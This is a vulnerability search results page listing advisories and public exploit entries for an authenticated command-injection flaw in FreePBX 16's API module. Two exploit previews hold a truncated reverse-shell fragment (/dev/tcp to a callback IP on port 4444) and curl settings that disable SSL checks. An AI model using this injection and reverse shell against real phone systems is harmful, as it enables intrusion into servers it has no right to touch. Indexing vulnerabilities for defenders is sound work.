CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

6 matches found

EUVD•added 2025/12/12 12:30 a.m.•4 views

EUVD-2024-55337

FreePBX 16 contains an authenticated remote code execution vulnerability in the API module that allows attackers with valid session credentials to execute arbitrary commands. Attackers can exploit the 'generatedocs' endpoint by crafting malicious POST requests with bash command injection to...

8.7CVSS8.4AI score0.0093EPSS

Exploits1References5

OSV•added 2025/12/11 10:15 p.m.•0 views

CVE-2024-58294

8.8CVSS6.6AI score

Exploits0References4

Vulnrichment•added 2025/12/11 9:36 p.m.•2 views

CVE-2024-58294 FreePBX 16 Authenticated Remote Code Execution via API Module

8.7CVSS8.6AI score0.0093EPSS

Exploits1References4

Cvelist•added 2025/12/11 9:36 p.m.•18 views

CVE-2024-58294 FreePBX 16 Authenticated Remote Code Execution via API Module

8.7CVSS0.0093EPSS

Exploits1References4

0day.today•added 2024/06/02 12:0 a.m.•185 views

FreePBX 16 - Remote Code Execution (Authenticated) Exploit

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; echo $response =...

7.4AI score

Exploits0

Exploit DB•added 2024/06/01 12:0 a.m.•333 views

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

7.4AI score

Exploits0

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by